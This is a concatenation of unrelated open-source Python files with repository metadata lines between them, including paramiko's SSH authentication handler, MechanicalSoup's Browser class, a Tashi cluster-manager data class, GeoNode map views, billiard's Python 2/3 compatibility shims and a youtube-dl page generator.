'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.constellation': {
'Meta': {'object_name': 'Constellation', 'db_table': "'mapConstellations'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'constellationID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'constellationName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constellations'", 'db_column': "'regionID'", 'to': u"orm['core.Region']"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
u'core.region': {
'Meta': {'object_name': 'Region', 'db_table': "'mapRegions'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'regionID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'regionName'"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
u'core.systemdata': {
'Meta': {'object_name': 'SystemData', 'db_table': "'mapSolarSystems'", 'managed': 'False'},
'constellation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'constellationID'", 'to': u"orm['core.Constellation']"}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'solarSystemID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'solarSystemName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'regionID'", 'to': u"orm['core.Region']"}),
'security': ('django.db.models.fields.FloatField', [], {}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
}
}
complete_apps = ['account']
| apache-2.0 |
shyamalschandra/picochess | libs/paramiko/auth_handler.py | 8 | 16836 | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
`.AuthHandler`
"""
import weakref
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_DISCONNECT, \
DISCONNECT_SERVICE_NOT_AVAILABLE, DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE, \
cMSG_USERAUTH_REQUEST, cMSG_SERVICE_ACCEPT, DEBUG, AUTH_SUCCESSFUL, INFO, \
cMSG_USERAUTH_SUCCESS, cMSG_USERAUTH_FAILURE, AUTH_PARTIALLY_SUCCESSFUL, \
cMSG_USERAUTH_INFO_REQUEST, WARNING, AUTH_FAILED, cMSG_USERAUTH_PK_OK, \
cMSG_USERAUTH_INFO_RESPONSE, MSG_SERVICE_REQUEST, MSG_SERVICE_ACCEPT, \
MSG_USERAUTH_REQUEST, MSG_USERAUTH_SUCCESS, MSG_USERAUTH_FAILURE, \
MSG_USERAUTH_BANNER, MSG_USERAUTH_INFO_REQUEST, MSG_USERAUTH_INFO_RESPONSE
from paramiko.message import Message
from paramiko.py3compat import bytestring
from paramiko.ssh_exception import SSHException, AuthenticationException, \
BadAuthenticationType, PartialAuthentication
from paramiko.server import InteractiveQuery
class AuthHandler (object):
"""
Internal class to handle the mechanics of authentication.
"""
def __init__(self, transport):
self.transport = weakref.proxy(transport)
self.username = None
self.authenticated = False
self.auth_event = None
self.auth_method = ''
self.banner = None
self.password = None
self.private_key = None
self.interactive_handler = None
self.submethods = None
# for server mode:
self.auth_username = None
self.auth_fail_count = 0
def is_authenticated(self):
return self.authenticated
def get_username(self):
if self.transport.server_mode:
return self.auth_username
else:
return self.username
def auth_none(self, username, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'none'
self.username = username
self._request_auth()
finally:
self.transport.lock.release()
def auth_publickey(self, username, key, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'publickey'
self.username = username
self.private_key = key
self._request_auth()
finally:
self.transport.lock.release()
def auth_password(self, username, password, event):
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'password'
self.username = username
self.password = password
self._request_auth()
finally:
self.transport.lock.release()
def auth_interactive(self, username, handler, event, submethods=''):
"""
response_list = handler(title, instructions, prompt_list)
"""
self.transport.lock.acquire()
try:
self.auth_event = event
self.auth_method = 'keyboard-interactive'
self.username = username
self.interactive_handler = handler
self.submethods = submethods
self._request_auth()
finally:
self.transport.lock.release()
def abort(self):
if self.auth_event is not None:
self.auth_event.set()
### internals...
def _request_auth(self):
m = Message()
m.add_byte(cMSG_SERVICE_REQUEST)
m.add_string('ssh-userauth')
self.transport._send_message(m)
def _disconnect_service_not_available(self):
m = Message()
m.add_byte(cMSG_DISCONNECT)
m.add_int(DISCONNECT_SERVICE_NOT_AVAILABLE)
m.add_string('Service not available')
m.add_string('en')
self.transport._send_message(m)
self.transport.close()
def _disconnect_no_more_auth(self):
m = Message()
m.add_byte(cMSG_DISCONNECT)
m.add_int(DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE)
m.add_string('No more auth methods available')
m.add_string('en')
self.transport._send_message(m)
self.transport.close()
def _get_session_blob(self, key, service, username):
m = Message()
m.add_string(self.transport.session_id)
m.add_byte(cMSG_USERAUTH_REQUEST)
m.add_string(username)
m.add_string(service)
m.add_string('publickey')
m.add_boolean(True)
m.add_string(key.get_name())
m.add_string(key)
return m.asbytes()
def wait_for_response(self, event):
while True:
event.wait(0.1)
if not self.transport.is_active():
e = self.transport.get_exception()
if (e is None) or issubclass(e.__class__, EOFError):
e = AuthenticationException('Authentication failed.')
raise e
if event.isSet():
break
if not self.is_authenticated():
e = self.transport.get_exception()
if e is None:
e = AuthenticationException('Authentication failed.')
# this is horrible. Python Exception isn't yet descended from
# object, so type(e) won't work. :(
if issubclass(e.__class__, PartialAuthentication):
return e.allowed_types
raise e
return []
def _parse_service_request(self, m):
service = m.get_text()
if self.transport.server_mode and (service == 'ssh-userauth'):
# accepted
m = Message()
m.add_byte(cMSG_SERVICE_ACCEPT)
m.add_string(service)
self.transport._send_message(m)
return
# dunno this one
self._disconnect_service_not_available()
def _parse_service_accept(self, m):
service = m.get_text()
if service == 'ssh-userauth':
self.transport._log(DEBUG, 'userauth is OK')
m = Message()
m.add_byte(cMSG_USERAUTH_REQUEST)
m.add_string(self.username)
m.add_string('ssh-connection')
m.add_string(self.auth_method)
if self.auth_method == 'password':
m.add_boolean(False)
password = bytestring(self.password)
m.add_string(password)
elif self.auth_method == 'publickey':
m.add_boolean(True)
m.add_string(self.private_key.get_name())
m.add_string(self.private_key)
blob = self._get_session_blob(self.private_key, 'ssh-connection', self.username)
sig = self.private_key.sign_ssh_data(blob)
m.add_string(sig)
elif self.auth_method == 'keyboard-interactive':
m.add_string('')
m.add_string(self.submethods)
elif self.auth_method == 'none':
pass
else:
raise SSHException('Unknown auth method "%s"' % self.auth_method)
self.transport._send_message(m)
else:
self.transport._log(DEBUG, 'Service request "%s" accepted (?)' % service)
def _send_auth_result(self, username, method, result):
# okay, send result
m = Message()
if result == AUTH_SUCCESSFUL:
self.transport._log(INFO, 'Auth granted (%s).' % method)
m.add_byte(cMSG_USERAUTH_SUCCESS)
self.authenticated = True
else:
self.transport._log(INFO, 'Auth rejected (%s).' % method)
m.add_byte(cMSG_USERAUTH_FAILURE)
m.add_string(self.transport.server_object.get_allowed_auths(username))
if result == AUTH_PARTIALLY_SUCCESSFUL:
m.add_boolean(True)
else:
m.add_boolean(False)
self.auth_fail_count += 1
self.transport._send_message(m)
if self.auth_fail_count >= 10:
self._disconnect_no_more_auth()
if result == AUTH_SUCCESSFUL:
self.transport._auth_trigger()
def _interactive_query(self, q):
# make interactive query instead of response
m = Message()
m.add_byte(cMSG_USERAUTH_INFO_REQUEST)
m.add_string(q.name)
m.add_string(q.instructions)
m.add_string(bytes())
m.add_int(len(q.prompts))
for p in q.prompts:
m.add_string(p[0])
m.add_boolean(p[1])
self.transport._send_message(m)
def _parse_userauth_request(self, m):
if not self.transport.server_mode:
# er, uh... what?
m = Message()
m.add_byte(cMSG_USERAUTH_FAILURE)
m.add_string('none')
m.add_boolean(False)
self.transport._send_message(m)
return
if self.authenticated:
# ignore
return
username = m.get_text()
service = m.get_text()
method = m.get_text()
self.transport._log(DEBUG, 'Auth request (type=%s) service=%s, username=%s' % (method, service, username))
if service != 'ssh-connection':
self._disconnect_service_not_available()
return
if (self.auth_username is not None) and (self.auth_username != username):
self.transport._log(WARNING, 'Auth rejected because the client attempted to change username in mid-flight')
self._disconnect_no_more_auth()
return
self.auth_username = username
if method == 'none':
result = self.transport.server_object.check_auth_none(username)
elif method == 'password':
changereq = m.get_boolean()
password = m.get_binary()
try:
password = password.decode('UTF-8')
except UnicodeError:
# some clients/servers expect non-utf-8 passwords!
# in this case, just return the raw byte string.
pass
if changereq:
# always treated as failure, since we don't support changing passwords, but collect
# the list of valid auth types from the callback anyway
self.transport._log(DEBUG, 'Auth request to change passwords (rejected)')
newpassword = m.get_binary()
try:
newpassword = newpassword.decode('UTF-8', 'replace')
except UnicodeError:
pass
result = AUTH_FAILED
else:
result = self.transport.server_object.check_auth_password(username, password)
elif method == 'publickey':
sig_attached = m.get_boolean()
keytype = m.get_text()
keyblob = m.get_binary()
try:
key = self.transport._key_info[keytype](Message(keyblob))
except SSHException as e:
self.transport._log(INFO, 'Auth rejected: public key: %s' % str(e))
key = None
except:
self.transport._log(INFO, 'Auth rejected: unsupported or mangled public key')
key = None
if key is None:
self._disconnect_no_more_auth()
return
# first check if this key is okay... if not, we can skip the verify
result = self.transport.server_object.check_auth_publickey(username, key)
if result != AUTH_FAILED:
# key is okay, verify it
if not sig_attached:
# client wants to know if this key is acceptable, before it
# signs anything... send special "ok" message
m = Message()
m.add_byte(cMSG_USERAUTH_PK_OK)
m.add_string(keytype)
m.add_string(keyblob)
self.transport._send_message(m)
return
sig = Message(m.get_binary())
blob = self._get_session_blob(key, service, username)
if not key.verify_ssh_sig(blob, sig):
self.transport._log(INFO, 'Auth rejected: invalid signature')
result = AUTH_FAILED
elif method == 'keyboard-interactive':
lang = m.get_string()
submethods = m.get_string()
result = self.transport.server_object.check_auth_interactive(username, submethods)
if isinstance(result, InteractiveQuery):
# make interactive query instead of response
self._interactive_query(result)
return
else:
result = self.transport.server_object.check_auth_none(username)
# okay, send result
self._send_auth_result(username, method, result)
def _parse_userauth_success(self, m):
self.transport._log(INFO, 'Authentication (%s) successful!' % self.auth_method)
self.authenticated = True
self.transport._auth_trigger()
if self.auth_event is not None:
self.auth_event.set()
def _parse_userauth_failure(self, m):
authlist = m.get_list()
partial = m.get_boolean()
if partial:
self.transport._log(INFO, 'Authentication continues...')
self.transport._log(DEBUG, 'Methods: ' + str(authlist))
self.transport.saved_exception = PartialAuthentication(authlist)
elif self.auth_method not in authlist:
self.transport._log(DEBUG, 'Authentication type (%s) not permitted.' % self.auth_method)
self.transport._log(DEBUG, 'Allowed methods: ' + str(authlist))
self.transport.saved_exception = BadAuthenticationType('Bad authentication type', authlist)
else:
self.transport._log(INFO, 'Authentication (%s) failed.' % self.auth_method)
self.authenticated = False
self.username = None
if self.auth_event is not None:
self.auth_event.set()
def _parse_userauth_banner(self, m):
banner = m.get_string()
self.banner = banner
lang = m.get_string()
self.transport._log(INFO, 'Auth banner: %s' % banner)
# who cares.
def _parse_userauth_info_request(self, m):
if self.auth_method != 'keyboard-interactive':
raise SSHException('Illegal info request from server')
title = m.get_text()
instructions = m.get_text()
m.get_binary() # lang
prompts = m.get_int()
prompt_list = []
for i in range(prompts):
prompt_list.append((m.get_text(), m.get_boolean()))
response_list = self.interactive_handler(title, instructions, prompt_list)
m = Message()
m.add_byte(cMSG_USERAUTH_INFO_RESPONSE)
m.add_int(len(response_list))
for r in response_list:
m.add_string(r)
self.transport._send_message(m)
def _parse_userauth_info_response(self, m):
if not self.transport.server_mode:
raise SSHException('Illegal info response from server')
n = m.get_int()
responses = []
for i in range(n):
responses.append(m.get_text())
result = self.transport.server_object.check_auth_interactive_response(responses)
if isinstance(type(result), InteractiveQuery):
# make interactive query instead of response
self._interactive_query(result)
return
self._send_auth_result(self.auth_username, 'keyboard-interactive', result)
_handler_table = {
MSG_SERVICE_REQUEST: _parse_service_request,
MSG_SERVICE_ACCEPT: _parse_service_accept,
MSG_USERAUTH_REQUEST: _parse_userauth_request,
MSG_USERAUTH_SUCCESS: _parse_userauth_success,
MSG_USERAUTH_FAILURE: _parse_userauth_failure,
MSG_USERAUTH_BANNER: _parse_userauth_banner,
MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
}
| gpl-3.0 |
tedlaz/pyted | sms/mechanicalsoup/browser.py | 1 | 4666 | import warnings
import requests
import bs4
from six.moves import urllib
from six import string_types
from .form import Form
import webbrowser
import tempfile
# see
# https://www.crummy.com/software/BeautifulSoup/bs4/doc/#specifying-the-parser-to-use
warnings.filterwarnings(
"ignore", "No parser was explicitly specified", module="bs4")
class Browser(object):
def __init__(self, session=None, soup_config=None, requests_adapters=None):
self.session = session or requests.Session()
if requests_adapters is not None:
for adaptee, adapter in requests_adapters.items():
self.session.mount(adaptee, adapter)
self.soup_config = soup_config or dict()
@staticmethod
def add_soup(response, soup_config):
if "text/html" in response.headers.get("Content-Type", ""):
response.soup = bs4.BeautifulSoup(
response.content, **soup_config)
def request(self, *args, **kwargs):
response = self.session.request(*args, **kwargs)
Browser.add_soup(response, self.soup_config)
return response
def get(self, *args, **kwargs):
response = self.session.get(*args, **kwargs)
Browser.add_soup(response, self.soup_config)
return response
def post(self, *args, **kwargs):
response = self.session.post(*args, **kwargs)
Browser.add_soup(response, self.soup_config)
return response
def _build_request(self, form, url=None, **kwargs):
method = str(form.get("method", "get"))
action = form.get("action")
url = urllib.parse.urljoin(url, action)
if url is None: # This happens when both `action` and `url` are None.
raise ValueError('no URL to submit to')
# read http://www.w3.org/TR/html5/forms.html
data = kwargs.pop("data", dict())
files = kwargs.pop("files", dict())
for input in form.select("input"):
name = input.get("name")
if not name:
continue
if input.get("type") in ("radio", "checkbox"):
if "checked" not in input.attrs:
continue
value = input.get("value", "on")
else:
# web browsers use empty string for inputs with missing values
value = input.get("value", "")
if input.get("type") == "checkbox":
data.setdefault(name, []).append(value)
elif input.get("type") == "file":
# read http://www.cs.tut.fi/~jkorpela/forms/file.html
# in web browsers, file upload only happens if the form"s (or
# submit button"s) enctype attribute is set to
# "multipart/form-data". we don"t care, simplify.
if not value:
continue
if isinstance(value, string_types):
value = open(value, "rb")
files[name] = value
else:
data[name] = value
for textarea in form.select("textarea"):
name = textarea.get("name")
if not name:
continue
data[name] = textarea.text
for select in form.select("select"):
name = select.get("name")
if not name:
continue
multiple = "multiple" in select.attrs
values = []
for i, option in enumerate(select.select("option")):
if (i == 0 and not multiple) or "selected" in option.attrs:
values.append(option.get("value", ""))
if multiple:
data[name] = values
elif values:
data[name] = values[-1]
if method.lower() == "get":
kwargs["params"] = data
else:
kwargs["data"] = data
return requests.Request(method, url, files=files, **kwargs)
def _prepare_request(self, form, url=None, **kwargs):
request = self._build_request(form, url, **kwargs)
return self.session.prepare_request(request)
def submit(self, form, url=None, **kwargs):
if isinstance(form, Form):
form = form.form
request = self._prepare_request(form, url, **kwargs)
response = self.session.send(request)
Browser.add_soup(response, self.soup_config)
return response
def launch_browser(self, soup):
"""Launch a browser on the page, for debugging purpose."""
with tempfile.NamedTemporaryFile(delete=False) as file:
file.write(soup.encode())
webbrowser.open('file://' + file.name)
| gpl-3.0 |
stroucki/tashi | src/tashi/clustermanager/data/getentoverride.py | 2 | 4973 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import subprocess
import time
import os
from tashi.rpycservices.rpyctypes import User, LocalImages, Instance, Host
from tashi.clustermanager.data import DataInterface
from tashi.util import instantiateImplementation, humanReadable
class GetentOverride(DataInterface):
def __init__(self, config):
DataInterface.__init__(self, config)
self.log = logging.getLogger(__name__)
self.baseDataObject = instantiateImplementation(config.get("GetentOverride", "baseData"), config)
self.dfs = instantiateImplementation(config.get("ClusterManager", "dfs"), config)
self.useLocal = config.get("GetentOverride", "getentFromLocalFile")
self.localFileName = config.get("GetentOverride", "getentLocalFile")
self.users = {}
self.lastUserUpdate = 0.0
self.fetchThreshold = float(config.get("GetentOverride", "fetchThreshold"))
def registerInstance(self, instance):
if type(instance) is not Instance:
self.log.exception("Argument is not of type Instance, but of type %s" % (type(instance)))
raise TypeError
return self.baseDataObject.registerInstance(instance)
def acquireInstance(self, instanceId):
return self.baseDataObject.acquireInstance(instanceId)
def releaseInstance(self, instance):
if type(instance) is not Instance:
self.log.exception("Argument is not of type Instance, but of type %s" % (type(instance)))
raise TypeError
return self.baseDataObject.releaseInstance(instance)
def removeInstance(self, instance):
if type(instance) is not Instance:
self.log.exception("Argument is not of type Instance, but of type %s" % (type(instance)))
raise TypeError
return self.baseDataObject.removeInstance(instance)
def acquireHost(self, hostId):
if type(hostId) is not int:
self.log.exception("Argument is not of type int, but of type %s" % (type(hostId)))
raise TypeError
return self.baseDataObject.acquireHost(hostId)
def releaseHost(self, host):
if type(host) is not Host:
self.log.exception("Argument is not of type Host, but of type %s" % (type(host)))
raise TypeError
return self.baseDataObject.releaseHost(host)
def getHosts(self):
return self.baseDataObject.getHosts()
def getHost(self, _id):
return self.baseDataObject.getHost(_id)
def getInstances(self):
return self.baseDataObject.getInstances()
def getInstance(self, _id):
return self.baseDataObject.getInstance(_id)
def getNetworks(self):
return self.baseDataObject.getNetworks()
def getNetwork(self, _id):
return self.baseDataObject.getNetwork(_id)
def getImages(self):
count = 0
myList = []
for i in self.dfs.list("images"):
myFile = self.dfs.getLocalHandle("images/" + i)
if os.path.isfile(myFile):
image = LocalImages(d={'id':count, 'imageName':i, 'imageSize':humanReadable(self.dfs.stat(myFile)[6])})
myList.append(image)
count += 1
return myList
def fetchFromGetent(self):
now = time.time()
if (now - self.lastUserUpdate > self.fetchThreshold):
myUsers = {}
# Use local getent file instead of querying the administrative db
if self.useLocal:
if os.path.exists(self.localFileName):
cmd = "cat %s" % self.localFileName
p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
else:
self.log.warning("getent cache file not found (%s)" % (self.localFileName))
p = subprocess.Popen("getent passwd".split(), stdout=subprocess.PIPE)
# Query administrative database
else:
p = subprocess.Popen("getent passwd".split(), stdout=subprocess.PIPE)
try:
for l in p.stdout.xreadlines():
ws = l.strip().split(":")
_id = int(ws[2])
name = ws[0]
user = User()
user.id = _id
user.name = name
myUsers[_id] = user
self.users = myUsers
self.lastUserUpdate = now
finally:
p.wait()
def getUsers(self):
self.fetchFromGetent()
return self.users
def getUser(self, _id):
self.fetchFromGetent()
return self.users[_id]
def registerHost(self, hostname, memory, cores, version):
return self.baseDataObject.registerHost(hostname, memory, cores, version)
def unregisterHost(self, hostId):
return self.baseDataObject.unregisterHost(hostId)
| apache-2.0 |
gdreich/geonode | geonode/maps/qgis_server_views.py | 16 | 2139 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.views.generic import CreateView, DetailView
from geonode.maps.models import Map, MapLayer
from geonode.layers.models import Layer
class MapCreateView(CreateView):
model = Map
fields = '__all__'
template_name = 'leaflet_maps/map_view.html'
context_object_name = 'map'
def get_context_data(self, **kwargs):
# list all required layers
layers = Layer.objects.all()
context = {
'create': True,
'layers': layers
}
return context
def get_success_url(self):
pass
def get_form_kwargs(self):
kwargs = super(MapCreateView, self).get_form_kwargs()
return kwargs
class MapDetailView(DetailView):
model = Map
template_name = 'leaflet_maps/map_view.html'
context_object_name = 'map'
def get_context_data(self, **kwargs):
# list all required layers
layers = Layer.objects.all()
context = {
'create': False,
'layers': layers,
'map': Map.objects.get(id=self.kwargs.get("mapid")),
'map_layers': MapLayer.objects.filter(map_id=self.kwargs.get("mapid")).order_by('stack_order')
}
return context
def get_object(self):
return Map.objects.get(id=self.kwargs.get("mapid"))
| gpl-3.0 |
andresriancho/billiard | billiard/five.py | 8 | 5346 | # -*- coding: utf-8 -*-
"""
celery.five
~~~~~~~~~~~
Compatibility implementations of features
only available in newer Python versions.
"""
from __future__ import absolute_import
# ############# py3k #########################################################
import sys
PY3 = sys.version_info[0] == 3
try:
reload = reload # noqa
except NameError: # pragma: no cover
from imp import reload # noqa
try:
from UserList import UserList # noqa
except ImportError: # pragma: no cover
from collections import UserList # noqa
try:
from UserDict import UserDict # noqa
except ImportError: # pragma: no cover
from collections import UserDict # noqa
# ############# time.monotonic ###############################################
if sys.version_info < (3, 3):
import platform
SYSTEM = platform.system()
if SYSTEM == 'Darwin':
import ctypes
from ctypes.util import find_library
libSystem = ctypes.CDLL('libSystem.dylib')
CoreServices = ctypes.CDLL(find_library('CoreServices'),
use_errno=True)
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
absolute_to_nanoseconds = CoreServices.AbsoluteToNanoseconds
absolute_to_nanoseconds.restype = ctypes.c_uint64
absolute_to_nanoseconds.argtypes = [ctypes.c_uint64]
def _monotonic():
return absolute_to_nanoseconds(mach_absolute_time()) * 1e-9
elif SYSTEM == 'Linux':
# from stackoverflow:
# questions/1205722/how-do-i-get-monotonic-time-durations-in-python
import ctypes
import os
CLOCK_MONOTONIC = 1 # see <linux/time.h>
class timespec(ctypes.Structure):
_fields_ = [
('tv_sec', ctypes.c_long),
('tv_nsec', ctypes.c_long),
]
librt = ctypes.CDLL('librt.so.1', use_errno=True)
clock_gettime = librt.clock_gettime
clock_gettime.argtypes = [
ctypes.c_int, ctypes.POINTER(timespec),
]
def _monotonic(): # noqa
t = timespec()
if clock_gettime(CLOCK_MONOTONIC, ctypes.pointer(t)) != 0:
errno_ = ctypes.get_errno()
raise OSError(errno_, os.strerror(errno_))
return t.tv_sec + t.tv_nsec * 1e-9
else:
from time import time as _monotonic
try:
from time import monotonic
except ImportError:
monotonic = _monotonic # noqa
if PY3:
import builtins
from queue import Queue, Empty, Full
from itertools import zip_longest
from io import StringIO, BytesIO
map = map
string = str
string_t = str
long_t = int
text_t = str
range = range
int_types = (int, )
open_fqdn = 'builtins.open'
def items(d):
return d.items()
def keys(d):
return d.keys()
def values(d):
return d.values()
def nextfun(it):
return it.__next__
exec_ = getattr(builtins, 'exec')
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
class WhateverIO(StringIO):
def write(self, data):
if isinstance(data, bytes):
data = data.encode()
StringIO.write(self, data)
else:
import __builtin__ as builtins # noqa
from Queue import Queue, Empty, Full # noqa
from itertools import imap as map, izip_longest as zip_longest # noqa
from StringIO import StringIO # noqa
string = unicode # noqa
string_t = basestring # noqa
text_t = unicode
long_t = long # noqa
range = xrange
int_types = (int, long)
open_fqdn = '__builtin__.open'
def items(d): # noqa
return d.iteritems()
def keys(d): # noqa
return d.iterkeys()
def values(d): # noqa
return d.itervalues()
def nextfun(it): # noqa
return it.next
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None): raise tp, value, tb""")
BytesIO = WhateverIO = StringIO # noqa
def with_metaclass(Type, skip_attrs=set(['__dict__', '__weakref__'])):
"""Class decorator to set metaclass.
Works with both Python 2 and Python 3 and it does not add
an extra class in the lookup order like ``six.with_metaclass`` does
(that is -- it copies the original class instead of using inheritance).
"""
def _clone_with_metaclass(Class):
attrs = dict((key, value) for key, value in items(vars(Class))
if key not in skip_attrs)
return Type(Class.__name__, Class.__bases__, attrs)
return _clone_with_metaclass
| bsd-3-clause |
jbuchbinder/youtube-dl | devscripts/gh-pages/generate-download.py | 28 | 1069 | #!/usr/bin/env python3
from __future__ import unicode_literals
import hashlib
import urllib.request
import json
versions_info = json.load(open('update/versions.json'))
version = versions_info['latest']
URL = versions_info['versions'][version]['bin'][0]
data = urllib.request.urlopen(URL).read()
# Read template page
with open('download.html.in', 'r', encoding='utf-8') as tmplf:
template = tmplf.read()
sha256sum = hashlib.sha256(data).hexdigest()
template = template.replace('@PROGRAM_VERSION@', version)
template = template.replace('@PROGRAM_URL@', URL)
template = template.replace('@PROGRAM_SHA256SUM@', sha256sum)
template = template.replace('@EXE_URL@', versions_info['versions'][version]['exe'][0])
template = template.replace('@EXE_SHA256SUM@', versions_info['versions'][version]['exe'][1])
template = template.replace('@TAR_URL@', versions_info['versions'][version]['tar'][0])
template = template.replace('@TAR_SHA256SUM@', versions_info['versions'][version]['tar'][1])
with open('download.html', 'w', encoding='utf-8') as dlf:
dlf.write(template)
| unlicense |
pcn/cassandra-1 | pylib/cqlshlib/wcwidth.py | 113 | 16049 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# adapted from http://www.cl.cam.ac.uk/~mgk25/ucs/wcwidth.c
# -thepaul
# This is an implementation of wcwidth() and wcswidth() (defined in
# IEEE Std 1002.1-2001) for Unicode.
#
# http://www.opengroup.org/onlinepubs/007904975/functions/wcwidth.html
# http://www.opengroup.org/onlinepubs/007904975/functions/wcswidth.html
#
# In fixed-width output devices, Latin characters all occupy a single
# "cell" position of equal width, whereas ideographic CJK characters
# occupy two such cells. Interoperability between terminal-line
# applications and (teletype-style) character terminals using the
# UTF-8 encoding requires agreement on which character should advance
# the cursor by how many cell positions. No established formal
# standards exist at present on which Unicode character shall occupy
# how many cell positions on character terminals. These routines are
# a first attempt of defining such behavior based on simple rules
# applied to data provided by the Unicode Consortium.
#
# For some graphical characters, the Unicode standard explicitly
# defines a character-cell width via the definition of the East Asian
# FullWidth (F), Wide (W), Half-width (H), and Narrow (Na) classes.
# In all these cases, there is no ambiguity about which width a
# terminal shall use. For characters in the East Asian Ambiguous (A)
# class, the width choice depends purely on a preference of backward
# compatibility with either historic CJK or Western practice.
# Choosing single-width for these characters is easy to justify as
# the appropriate long-term solution, as the CJK practice of
# displaying these characters as double-width comes from historic
# implementation simplicity (8-bit encoded characters were displayed
# single-width and 16-bit ones double-width, even for Greek,
# Cyrillic, etc.) and not any typographic considerations.
#
# Much less clear is the choice of width for the Not East Asian
# (Neutral) class. Existing practice does not dictate a width for any
# of these characters. It would nevertheless make sense
# typographically to allocate two character cells to characters such
# as for instance EM SPACE or VOLUME INTEGRAL, which cannot be
# represented adequately with a single-width glyph. The following
# routines at present merely assign a single-cell width to all
# neutral characters, in the interest of simplicity. This is not
# entirely satisfactory and should be reconsidered before
# establishing a formal standard in this area. At the moment, the
# decision which Not East Asian (Neutral) characters should be
# represented by double-width glyphs cannot yet be answered by
# applying a simple rule from the Unicode database content. Setting
# up a proper standard for the behavior of UTF-8 character terminals
